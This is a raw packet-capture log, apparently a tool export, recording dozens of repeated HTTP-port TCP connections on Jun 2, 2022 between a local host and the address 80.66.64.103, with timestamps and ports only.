                                                                              Jun 2, 2022 01:54:27.441345930 CEST4982480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:27.531812906 CEST804982480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:27.673016071 CEST4982580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:27.763667107 CEST804982580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:27.763796091 CEST4982580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:27.778292894 CEST4982580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:27.912547112 CEST804982580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:27.957964897 CEST804982580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:27.959479094 CEST4982580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:27.993967056 CEST4982580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:28.084755898 CEST804982580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:28.240025043 CEST4982680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:28.333941936 CEST804982680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:28.334057093 CEST4982680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:28.377083063 CEST4982680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:28.511540890 CEST804982680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:28.559840918 CEST804982680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:28.560014963 CEST4982680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:28.614712000 CEST4982680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:28.708539963 CEST804982680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:28.761332035 CEST4982780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:28.851727962 CEST804982780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:28.851872921 CEST4982780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:28.893296003 CEST4982780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:29.027290106 CEST804982780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:29.072504997 CEST804982780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:29.072669029 CEST4982780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:29.105329990 CEST4982780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:29.196063042 CEST804982780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:29.287302017 CEST4982880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:29.381536961 CEST804982880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:29.381725073 CEST4982880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:29.678179026 CEST4982880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:29.815134048 CEST804982880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:29.862505913 CEST804982880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:29.862612963 CEST4982880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:29.893035889 CEST4982880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:29.987674952 CEST804982880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:30.162415028 CEST4982980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:30.256622076 CEST804982980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:30.256721020 CEST4982980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:30.271644115 CEST4982980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:30.408030987 CEST804982980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:30.455723047 CEST804982980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:30.455967903 CEST4982980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:30.473851919 CEST4982980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:30.567908049 CEST804982980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:30.600541115 CEST4983080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:30.694042921 CEST804983080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:30.694168091 CEST4983080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:30.708453894 CEST4983080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:30.843020916 CEST804983080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:30.890086889 CEST804983080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:30.890259981 CEST4983080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:30.917895079 CEST4983080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:31.011286974 CEST804983080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:31.038098097 CEST4983180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:31.129973888 CEST804983180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:31.130105972 CEST4983180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:31.147058964 CEST4983180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:31.280267000 CEST804983180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:31.328547001 CEST804983180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:31.328756094 CEST4983180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:31.350227118 CEST4983180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:31.442029953 CEST804983180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:31.701355934 CEST4983280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:31.796756983 CEST804983280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:31.796858072 CEST4983280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:31.829694033 CEST4983280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:31.968632936 CEST804983280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:32.013287067 CEST804983280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:32.013479948 CEST4983280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:32.021636963 CEST4983280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:32.117001057 CEST804983280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:32.349802017 CEST4983380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:32.444597960 CEST804983380.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:32.444693089 CEST4983380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:32.459145069 CEST4983380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:32.596232891 CEST804983380.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:32.644280910 CEST804983380.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:32.644464970 CEST4983380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:32.677443027 CEST4983380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:32.772207975 CEST804983380.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:32.860441923 CEST4983480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:32.954180002 CEST804983480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:32.954344034 CEST4983480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:32.993751049 CEST4983480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:33.127392054 CEST804983480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:33.174819946 CEST804983480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:33.174990892 CEST4983480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:33.209486008 CEST4983480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:33.302926064 CEST804983480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:33.444664955 CEST4983580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:33.535733938 CEST804983580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:33.535831928 CEST4983580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:33.554230928 CEST4983580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:33.687400103 CEST804983580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:33.734493971 CEST804983580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:33.734678030 CEST4983580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:33.771739960 CEST4983580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:33.862818003 CEST804983580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:34.006814003 CEST4983680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:34.100238085 CEST804983680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:34.100383043 CEST4983680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:34.112032890 CEST4983680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:34.243928909 CEST804983680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:34.293441057 CEST804983680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:34.293703079 CEST4983680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:34.338324070 CEST4983680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:34.430135965 CEST804983680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:34.502310991 CEST4983780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:34.594686985 CEST804983780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:34.594854116 CEST4983780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:34.756139994 CEST4983780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:34.891618967 CEST804983780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:34.938349962 CEST804983780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:34.938582897 CEST4983780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:34.958702087 CEST4983780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:35.051022053 CEST804983780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:35.194554090 CEST4983880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:35.287606955 CEST804983880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:35.287712097 CEST4983880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:35.308939934 CEST4983880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:35.444581985 CEST804983880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:35.491517067 CEST804983880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:35.491641998 CEST4983880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:35.506699085 CEST4983880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:35.599598885 CEST804983880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:35.676059961 CEST4983980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:35.771349907 CEST804983980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:35.771452904 CEST4983980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:35.815421104 CEST4983980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:35.952240944 CEST804983980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:36.000215054 CEST804983980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:36.000392914 CEST4983980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:36.025080919 CEST4983980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:36.120317936 CEST804983980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:36.199316025 CEST4984080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:36.292803049 CEST804984080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:36.292941093 CEST4984080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:36.304157019 CEST4984080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:36.439841986 CEST804984080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:36.486763000 CEST804984080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:36.486926079 CEST4984080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:36.506467104 CEST4984080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:36.600095987 CEST804984080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:36.745748043 CEST4984180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:36.838119984 CEST804984180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:36.838300943 CEST4984180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:36.841593981 CEST4984180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:36.976047039 CEST804984180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:37.025984049 CEST804984180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:37.026159048 CEST4984180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:37.036134005 CEST4984180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:37.127991915 CEST804984180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:37.344995022 CEST4984280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:37.438411951 CEST804984280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:37.438540936 CEST4984280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:37.470331907 CEST4984280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:37.607374907 CEST804984280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:37.654067039 CEST804984280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:37.654194117 CEST4984280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:37.692013979 CEST4984280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:37.785281897 CEST804984280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:37.823703051 CEST4984380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:37.916599035 CEST804984380.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:37.916732073 CEST4984380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:37.930779934 CEST4984380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:38.066946983 CEST804984380.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:38.112637997 CEST804984380.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:38.112803936 CEST4984380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:38.166961908 CEST4984380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:38.259813070 CEST804984380.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:38.371193886 CEST4984480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:38.466234922 CEST804984480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:38.466335058 CEST4984480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:38.495305061 CEST4984480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:38.631690025 CEST804984480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:38.679277897 CEST804984480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:38.679378986 CEST4984480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:38.694259882 CEST4984480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:38.789482117 CEST804984480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:38.897675037 CEST4984580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:38.992115974 CEST804984580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:38.992268085 CEST4984580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:39.016304970 CEST4984580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:39.151954889 CEST804984580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:39.200731039 CEST804984580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:39.200942039 CEST4984580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:39.223228931 CEST4984580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:39.317545891 CEST804984580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:39.410367012 CEST4984680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:39.504767895 CEST804984680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:39.505011082 CEST4984680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:39.535861969 CEST4984680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:39.672065020 CEST804984680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:39.718588114 CEST804984680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:39.718724012 CEST4984680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:39.896855116 CEST4984680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:39.991437912 CEST804984680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:40.275507927 CEST4984780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:40.369625092 CEST804984780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:40.369760990 CEST4984780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:40.420239925 CEST4984780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:40.474313021 CEST4978180192.168.2.4104.21.2.205
                                                                              Jun 2, 2022 01:54:40.554995060 CEST804984780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:40.603180885 CEST804984780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:40.603327036 CEST4984780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:40.635107040 CEST4984780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:40.729341984 CEST804984780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:40.803236008 CEST4984880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:40.897286892 CEST804984880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:40.897434950 CEST4984880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:40.940109968 CEST4984880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:41.076428890 CEST804984880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:41.123086929 CEST804984880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:41.123231888 CEST4984880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:41.128509998 CEST4984880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:41.223345995 CEST804984880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:41.315234900 CEST4984980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:41.405580997 CEST804984980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:41.407541990 CEST4984980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:41.432431936 CEST4984980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:41.566812038 CEST804984980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:41.611175060 CEST804984980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:41.611298084 CEST4984980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:41.631186008 CEST4984980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:41.728401899 CEST804984980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:42.086158037 CEST4985080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:42.179639101 CEST804985080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:42.179785013 CEST4985080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:42.196474075 CEST4985080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:42.331391096 CEST804985080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:42.380084991 CEST804985080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:42.380244017 CEST4985080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:42.466958046 CEST4985080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:42.560611010 CEST804985080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:42.970841885 CEST4985180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:43.061141014 CEST804985180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:43.061340094 CEST4985180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:43.268559933 CEST4985180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:43.402662039 CEST804985180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:43.447304010 CEST804985180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:43.447464943 CEST4985180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:43.653106928 CEST4985180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:43.743392944 CEST804985180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:45.090601921 CEST4985280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:45.185089111 CEST804985280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:45.185350895 CEST4985280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:46.408171892 CEST4985280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:46.543962002 CEST804985280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:46.592335939 CEST804985280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:46.592489958 CEST4985280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:46.635616064 CEST4985280192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:46.730051041 CEST804985280.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:46.794855118 CEST4985380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:46.885226965 CEST804985380.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:46.885319948 CEST4985380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:46.902584076 CEST4985380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:47.034513950 CEST804985380.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:47.082290888 CEST804985380.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:47.082442045 CEST4985380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:47.105207920 CEST4985380192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:47.195542097 CEST804985380.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:47.320880890 CEST4985480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:47.412939072 CEST804985480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:47.413058043 CEST4985480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:47.429553032 CEST4985480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:47.567761898 CEST804985480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:47.611768961 CEST804985480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:47.611974001 CEST4985480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:47.632723093 CEST4985480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:47.724874020 CEST804985480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:47.832310915 CEST4985580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:47.926379919 CEST804985580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:47.926486969 CEST4985580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:48.113243103 CEST4985580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:48.247900963 CEST804985580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:48.297286987 CEST804985580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:48.297357082 CEST4985580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:48.297584057 CEST4985580192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:48.391443014 CEST804985580.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:48.420846939 CEST4985680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:48.511600971 CEST804985680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:48.511677980 CEST4985680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:48.512197971 CEST4985680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:48.643270016 CEST804985680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:48.693202019 CEST804985680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:48.693370104 CEST4985680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:48.706813097 CEST4985680192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:48.797451019 CEST804985680.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:48.820369005 CEST4985780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:48.914633989 CEST804985780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:48.914818048 CEST4985780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:48.921276093 CEST4985780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:49.056062937 CEST804985780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:49.107945919 CEST804985780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:49.110716105 CEST4985780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:49.110953093 CEST4985780192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:49.205143929 CEST804985780.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:49.266563892 CEST4985880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:49.359595060 CEST804985880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:49.359699011 CEST4985880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:49.360292912 CEST4985880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:49.495220900 CEST804985880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:49.543080091 CEST804985880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:49.543173075 CEST4985880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:49.576837063 CEST4985880192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:49.669686079 CEST804985880.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:49.700635910 CEST4985980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:49.795336008 CEST804985980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:49.795516014 CEST4985980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:49.805320024 CEST4985980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:49.940159082 CEST804985980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:49.988356113 CEST804985980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:49.991139889 CEST4985980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:50.014492035 CEST4985980192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:50.109924078 CEST804985980.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:50.142328024 CEST4986080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:50.235274076 CEST804986080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:50.235421896 CEST4986080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:50.236610889 CEST4986080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:50.370897055 CEST804986080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:50.418059111 CEST804986080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:50.418159962 CEST4986080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:50.418375015 CEST4986080192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:50.511087894 CEST804986080.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:50.562968016 CEST4986180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:50.655656099 CEST804986180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:50.655853987 CEST4986180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:50.675679922 CEST4986180192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:54:50.808610916 CEST804986180.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:54:50.857481003 CEST804986180.66.64.103192.168.2.4
